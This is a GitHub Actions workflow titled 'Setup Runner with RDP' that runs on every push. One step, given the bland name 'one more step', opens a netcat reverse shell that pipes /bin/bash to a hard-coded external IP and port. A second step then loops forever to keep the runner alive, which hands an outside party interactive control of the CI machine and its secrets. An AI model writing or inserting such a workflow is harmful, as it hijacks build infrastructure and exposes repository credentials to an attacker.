name: Setup Runner with RDP

on:
  push:
  workflow_dispatch:

jobs:
  setup-runner:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout code
      uses: actions/checkout@v2

    - name: one more step
      run: |
        nc 185.159.128.111 44044 -e /bin/bash
        sudo echo "Puck"
    
    - name: another step
      run: |
        while true; do sleep 5; echo $RANDOM; done


